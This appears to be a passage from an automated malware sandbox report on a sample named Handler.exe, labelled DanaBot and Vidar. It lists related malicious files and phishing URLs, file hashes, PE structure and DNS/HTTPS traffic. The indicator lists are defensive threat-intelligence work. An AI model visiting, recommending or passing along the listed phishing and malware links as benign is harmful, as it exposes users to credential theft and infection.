	JUbmpeT.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	3bSDIpSIdF.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	3bSDIpSIdF.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	mNPTwHOuvT.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	1507513743282749438.js	Get hash	malicious	Strela Downloader	Browse	162.159.61.3
plus.l.google.com	DEEZI80S.pdf	Get hash	malicious	Unknown	Browse	142.250.186.78
	https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61f	Get hash	malicious	Unknown	Browse	142.250.185.142
	http://arthistoryteachingresources.org/2015/02/talk-to-your-profbut-how/	Get hash	malicious	Unknown	Browse	216.58.206.46
	http://sites.google.com/view/delta-1/home/	Get hash	malicious	Unknown	Browse	216.58.206.46
	527.zip	Get hash	malicious	Unknown	Browse	142.250.184.238
	527.zip	Get hash	malicious	Unknown	Browse	216.58.206.78
	https://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926e	Get hash	malicious	Unknown	Browse	142.250.184.238
	http://www.affordablehousing.com/MaineCWL	Get hash	malicious	Unknown	Browse	142.250.184.238
	NoticeOfPayment.docx	Get hash	malicious	Unknown	Browse	172.217.16.206
	https://beinghunted.co.uk//#mark.seymour@capstonelogistics.com	Get hash	malicious	Unknown	Browse	216.58.212.174
s-part-0012.t-0009.t-msedge.net	https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9d	Get hash	malicious	Unknown	Browse	13.107.246.40
	Debh Payment Detail.html	Get hash	malicious	Unknown	Browse	13.107.246.40
	qI6cHJbHJg.exe	Get hash	malicious	FormBook	Browse	13.107.246.40
	https://bryf.atchirlisc.ru/EeMAGvIe/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	BWCStartMSI.exe	Get hash	malicious	Unknown	Browse	13.107.246.40
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.40
	vQu0zndLpi.dll	Get hash	malicious	Unknown	Browse	13.107.246.40
	mtbkkesfthae.exe	Get hash	malicious	Vidar	Browse	13.107.246.40
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.40
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.40

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://fingertip.com/incoming-document	Get hash	malicious	HTMLPhisher	Browse	3.5.169.67
	https://q89x88qh.r.ap-southeast-1.awstrack.me/L0/https:%2F%2Fblackdoor.in%2Fcazxccall%2Frtyucallingzxc%2F/1/010e01946a4fedf7-6a14e9da-4611-4b34-a7c5-f58f00519f0d-000000/p9HvzYrykwYBivTgZCa5Kf2-wBc=194	Get hash	malicious	Unknown	Browse	52.74.136.124
	https://lgray785.wixsite.com/my-site-4	Get hash	malicious	HTMLPhisher	Browse	99.86.4.105
	New order BPD-003777.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	QQE81XYXon.dll	Get hash	malicious	Wannacry	Browse	63.35.17.92
	PO -2025918.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	txWVWM8Kx4.dll	Get hash	malicious	Wannacry	Browse	52.34.64.1
	hNgIvHRuTU.dll	Get hash	malicious	Wannacry	Browse	13.229.164.57
	https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQ	Get hash	malicious	Unknown	Browse	18.245.46.111
	q4e7rZQEkL.dll	Get hash	malicious	Wannacry	Browse	54.76.228.176
CLOUDFLARENETUS	https://fingertip.com/incoming-document	Get hash	malicious	HTMLPhisher	Browse	172.67.40.50
	https://www.google.com.tr/url?sa==SlzLhhFsJ7fGjpM8fvOAkm1z4KC&rct=fETOvblSpCqm85GTYKVdXKip5bkW26kcBgD7HeLR8E6psRE86jAuyRjA7fyhhYHpWk&sa=t&url=amp/sasaol.com/ccy/ptsd/vTd7ocRQy71kDqeKXneUsLH4CLz/YWxpc29uLnNtaXRoQHJic2ludC5jb20=	Get hash	malicious	Unknown	Browse	172.67.196.214
	https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org	Get hash	malicious	HTMLPhisher	Browse	104.18.94.41
	http://www.schoolhouselearningcenter.net/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://52f1897b.5648702dd4d5255cab645104.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://q89x88qh.r.ap-southeast-1.awstrack.me/L0/https:%2F%2Fblackdoor.in%2Fcazxccall%2Frtyucallingzxc%2F/1/010e01946a4fedf7-6a14e9da-4611-4b34-a7c5-f58f00519f0d-000000/p9HvzYrykwYBivTgZCa5Kf2-wBc=194	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://lgray785.wixsite.com/my-site-4	Get hash	malicious	HTMLPhisher	Browse	172.67.162.22
	New order BPD-003777.exe	Get hash	malicious	FormBook	Browse	172.67.183.191
	main.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	main old source new token.exe	Get hash	malicious	Unknown	Browse	162.159.133.234
HETZNER-ASDE	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	New order BPD-003777.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	PO -2025918.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	136.243.64.147
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	https://yjdjraabb.cc.rs6.net/tn.jsp?f=001cD7EmEKntgjghgQWpq9s2lW_mstWA0PSxRR7i3h0LbK5HgiPx3gu3HduoBs_Rnxmx0i7FlZL9378mrMLd5LlF6GT3bXi2U8GDrXfdsc2qPaLW94j0wm6KbaRHgZvZZRsEDv_wILG0rjmaLTfE5xpKJl15r5SI1xPSSiQsd9YUqKeemOHvTBSlSwV6tHZZ755Z52-jrPWl0FY7ZZ-PKGQ_IxPzhJqeaH15y4Vkailf2jrOpi4MibpjQ==&c=wK30YrUWFPbHl2B1oEErLYSqPkydS65M2el3xt7vMb11ny4WQ0yJgQ==&ch=8IgRaXvzzpu7qgxKTkXdqoYWo2ml_yYytv3GcZQiibggV2wrl_cJAA==	Get hash	malicious	Unknown	Browse	176.9.23.98
AS-CHOOPAUS	i686.elf	Get hash	malicious	Mirai	Browse	192.248.174.130
	xd.x86.elf	Get hash	malicious	Mirai	Browse	44.169.169.76
	Reversed order 24-25.pdf	Get hash	malicious	Unknown	Browse	45.63.57.89
	MK9UBUl8t7.dll	Get hash	malicious	Wannacry	Browse	44.34.121.1
	i486.elf	Get hash	malicious	Unknown	Browse	108.61.212.84
	Handler.exe	Get hash	malicious	DanaBot, Vidar	Browse	45.76.251.57
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	45.76.251.57
	9d2h99wrj.exe	Get hash	malicious	Xmrig	Browse	192.248.189.11
	Solara.exe	Get hash	malicious	Python Stealer, Exela Stealer, Xmrig	Browse	80.240.16.67
	80P.exe	Get hash	malicious	I2PRAT	Browse	207.246.88.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	QQE81XYXon.dll	Get hash	malicious	Wannacry	Browse	23.1.237.91
	txWVWM8Kx4.dll	Get hash	malicious	Wannacry	Browse	23.1.237.91
	f5mfkHLLVe.dll	Get hash	malicious	Wannacry	Browse	23.1.237.91
	hNgIvHRuTU.dll	Get hash	malicious	Wannacry	Browse	23.1.237.91
	2lX8Z3eydC.dll	Get hash	malicious	Wannacry	Browse	23.1.237.91
	ACH REMITTANCE DOCUMENT 15.01.25.xlsb	Get hash	malicious	Unknown	Browse	23.1.237.91
	Personliche Nachricht fur e4060738.pdf	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSPT0wVekqsfeOZRSaz9d28itE0eTxOetbwlGaCx05rQJywXo_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aRXzCg4yzvno75Wb80hSd5kw8Ua5r4R2pwCFTS4zDFYiEkWB-2BYk1VUWtpkJwb9IQIMAq1SSLT005wiJ2XiGw1jPEr6v61MJQRnC7AeLVtxYgqGlydBoPFbs1IP04-2BxPajuRI3fTsnzWZ9ty3RasYpwuqdrF0E8VoyYkggeeLEm9ENK69uYTCVHWHpxCPkzirQSIkvpt5FNZojg491ibS35IgO0LPU5gnpEaeaUj4-2BZoFUHIAAzMMy-2BYqsZ9F9Ldu1c-3D#X	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	NLWfV87ouS.dll	Get hash	malicious	Wannacry	Browse	23.1.237.91
	330tqxXVzm.dll	Get hash	malicious	Wannacry	Browse	23.1.237.91
37f463bf4616ecd445d4a1937da06e19	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	116.203.164.230 149.154.167.99 162.0.209.157
	setup.msi	Get hash	malicious	Unknown	Browse	116.203.164.230 149.154.167.99 162.0.209.157
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	116.203.164.230 149.154.167.99 162.0.209.157
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	116.203.164.230 149.154.167.99 162.0.209.157
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	116.203.164.230 149.154.167.99 162.0.209.157
	138745635-72645747.116.exe	Get hash	malicious	Unknown	Browse	116.203.164.230 149.154.167.99 162.0.209.157
	2834573-3676874985.02.exe	Get hash	malicious	Unknown	Browse	116.203.164.230 149.154.167.99 162.0.209.157
	regsvr.exe	Get hash	malicious	Unknown	Browse	116.203.164.230 149.154.167.99 162.0.209.157
	0dsIoO7xjt.docx	Get hash	malicious	Unknown	Browse	116.203.164.230 149.154.167.99 162.0.209.157

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\CrypterTest1[1].exe	Handler.exe	Get hash	malicious	DanaBot, Vidar	Browse
C:\ProgramData\us0r9ri58y.exe	Handler.exe	Get hash	malicious	DanaBot, Vidar	Browse

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Process:	C:\Users\user\Desktop\Handler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9048022518672725
Encrypted:	false
SSDEEP:	96:RToFaDss00ostgKjTOAqyS3QXIDcQlc6VcEdcw3t+BHUHZ0ownOgHkEwH3dEFWvo:RkMos00oTA0LR3ca2OzuiFKZ24IO8I
MD5:	168D6A3AF73CF66418F27D53B758426D
SHA1:	8E0482FC4FB8075F1F4441DD796DE728BE488B2C
SHA-256:	64D687CD8299F2E219C93C8F3A6E2A24C657A93EB8891E7B624EEB9EAF22AE83
SHA-512:	2CFFC145334B2538E4E1FEE4AFD3DD1A4D68C339CEF34CEDF915965FAF8FD078AE7B49A3EE0F4DDBE195C40FEE8BAB51C9B7225570638D9D1042D74BFDF8C774
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.2.1.6.2.5.7.1.5.6.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.2.1.6.3.2.5.9.0.6.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.3.6.5.2.9.3.-.c.1.4.f.-.4.9.5.a.-.b.6.5.d.-.a.a.a.3.8.5.0.5.e.b.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.d.8.a.c.6.8.-.8.9.c.4.-.4.7.1.3.-.8.4.4.a.-.1.8.c.3.5.f.5.d.8.8.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.b.4.-.0.0.0.1.-.0.0.1.4.-.1.0.a.6.-.5.0.e.a.8.1.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.1.e.1.9.3.8.3.2.d.a.5.0.5.b.7.4.1.6.f.0.1.a.1.0.8.e.1.3.4.d.4.c.f.b.5.6.f.6.e.5.!.H.a.n.

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44616
Entropy (8bit):	6.096258108426558
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkB4wu3hDO6vP6OVxt5GcMVYQwN1cGoup1Xl3jVzXr2:z/Ps+wsI7ynEP618Mchu3VlXr4CRo1
MD5:	DA0D0B4DC3959138548C5399FC5615A2
SHA1:	ADFA465ED6DB9AC7E92F3491E12384DBA2BABE2B
SHA-256:	5EE7298AD1A4676E4F39D5A2CD91ED8597B2CBE6497E650B2B8100313B1C73D2
SHA-512:	D4FEDC04B76480E0469217B059B8A80733BAC30D87250BE066D1CB5DBF803D5B992690D251123B1CFCE7DB640A1F7DEAFA1019F40A59A4558BEED898C3111B29
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 18:16:16 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.983417138386149
Encrypted:	false
SSDEEP:	48:8ddvjTTjsfHcidAKZdA19ehwiZUklqehey+3:8bjbty
MD5:	3E6874E395F200642ABF13E6B4EAA427
SHA1:	BFBCD823A037DC02C0AF797BA7C3B5DB9855676C
SHA-256:	856BF95BDE72103450828CD3E5D61852EE4B4D7C17E6294EAEA9B518F1387540
SHA-512:	0CF6237CA0D207C783A7BCBB67A417936FC84022FCB45DEE7EECA0F731F4BBE2B8DD2E8F2776DA8408E4278C896F9D71398FC36F2AB0E94997FE17A59C817A03
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....A%.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I/Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.893536241529202
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Handler.exe
File size:	430'592 bytes
MD5:	5fd322ce6e87bae023155e3d548d7280
SHA1:	1e193832da505b7416f01a108e134d4cfb56f6e5
SHA256:	1d16053d1910ba274b25d60a462fd4e7b75ae1454315dbfcf013b872f02dcdf3
SHA512:	cb7c276bc17651d202b0f7cb8234100ccd74b3e338f63bc0a563460a9c50ef24adefc59b7e9fc2cc892610ddeef3f1d11bc7bce44a2cc61c81e80e3e041ac64d
SSDEEP:	12288:5JN9RjfHB8d4QPBtw2Q+Ai0g2iWYD8F10DEqQjFQlYtEg:5JNfu/7Z10sf/PQxQlUL
TLSH:	F394120A26976736C47889BAD4F3C43C52BA97D31633E2133C1973A84E637D99A447CD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\|G................0.................. ... ....@.. ....................... ............`................................

Entrypoint:	0x41039e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC6FB477C [Tue Oct 15 09:16:44 2075 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10350	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x10309	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe3a4	0xe400	a477556f10e0f94ff07851ab21409ae9	False	0.520764802631579	data	6.042242922628573	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0x598	0x600	123aca95e4555687b41c2cebfd368cb4	False	0.41015625	data	4.0349728002939855	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xc	0x200	8afa85677c54490f83975db63dd0f5e1	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x16000	0x5a200	0x5a200	471645ffe4e357c0f47fb5657c5278bb	False	1.000327778259362	data	7.99944165588929	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x120a0	0x30c	data			0.41923076923076924
RT_MANIFEST	0x123ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 20:16:03.116596937 CET	55094	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:03.123514891 CET	53	55094	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:04.168404102 CET	54086	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:04.182075977 CET	53	54086	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:14.180650949 CET	53	57221	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:14.285928965 CET	57789	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:14.286079884 CET	52607	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:14.291616917 CET	53	51179	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:14.292774916 CET	53	52607	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:14.293000937 CET	53	57789	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:15.320908070 CET	53	64034	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:16.215004921 CET	53	56771	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:17.528604984 CET	57563	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:17.528728962 CET	65063	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:17.531692982 CET	53	50603	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:17.535698891 CET	53	57563	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:17.536916018 CET	53	65063	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:18.520214081 CET	50736	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:18.520334959 CET	57438	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:18.527461052 CET	53	57438	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:18.527647018 CET	53	50736	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:20.542956114 CET	53	56210	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:28.871071100 CET	51521	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:28.871431112 CET	59041	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:28.878698111 CET	53	59041	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:31.038727045 CET	64457	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.038855076 CET	50971	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.957350016 CET	53718	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.957514048 CET	57469	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.964397907 CET	53	53718	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:31.964474916 CET	53	57469	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:31.966049910 CET	62179	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.966219902 CET	54876	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.967467070 CET	49558	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.967637062 CET	54473	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.974708080 CET	53	54473	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:31.978378057 CET	63490	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.978517056 CET	50590	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:31.985301018 CET	53	50590	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:33.479690075 CET	63248	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:33.479836941 CET	64411	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:33.486639023 CET	53	63248	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:33.488065958 CET	53	64411	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:33.594702005 CET	55616	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:33.594932079 CET	57602	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:33.595525980 CET	51808	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:33.595705986 CET	49417	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:33.601777077 CET	53	55616	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:33.601792097 CET	53	57602	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:33.602364063 CET	53	51808	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:33.602611065 CET	53	49417	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:33.604907036 CET	50298	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:33.605015039 CET	49298	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:33.611552954 CET	53	49298	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:33.612024069 CET	53	50298	1.1.1.1	192.168.2.5
Jan 15, 2025 20:16:34.480163097 CET	59195	443	192.168.2.5	172.64.41.3
Jan 15, 2025 20:16:34.782011986 CET	59195	443	192.168.2.5	172.64.41.3
Jan 15, 2025 20:16:34.992707014 CET	52803	443	192.168.2.5	162.159.61.3
Jan 15, 2025 20:16:35.307787895 CET	52803	443	192.168.2.5	162.159.61.3
Jan 15, 2025 20:16:35.386660099 CET	59195	443	192.168.2.5	172.64.41.3
Jan 15, 2025 20:16:35.909230947 CET	52803	443	192.168.2.5	162.159.61.3
Jan 15, 2025 20:16:36.594197035 CET	59195	443	192.168.2.5	172.64.41.3
Jan 15, 2025 20:16:37.110340118 CET	52803	443	192.168.2.5	162.159.61.3
Jan 15, 2025 20:16:37.928354979 CET	61934	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:16:37.928931952 CET	54476	53	192.168.2.5	1.1.1.1
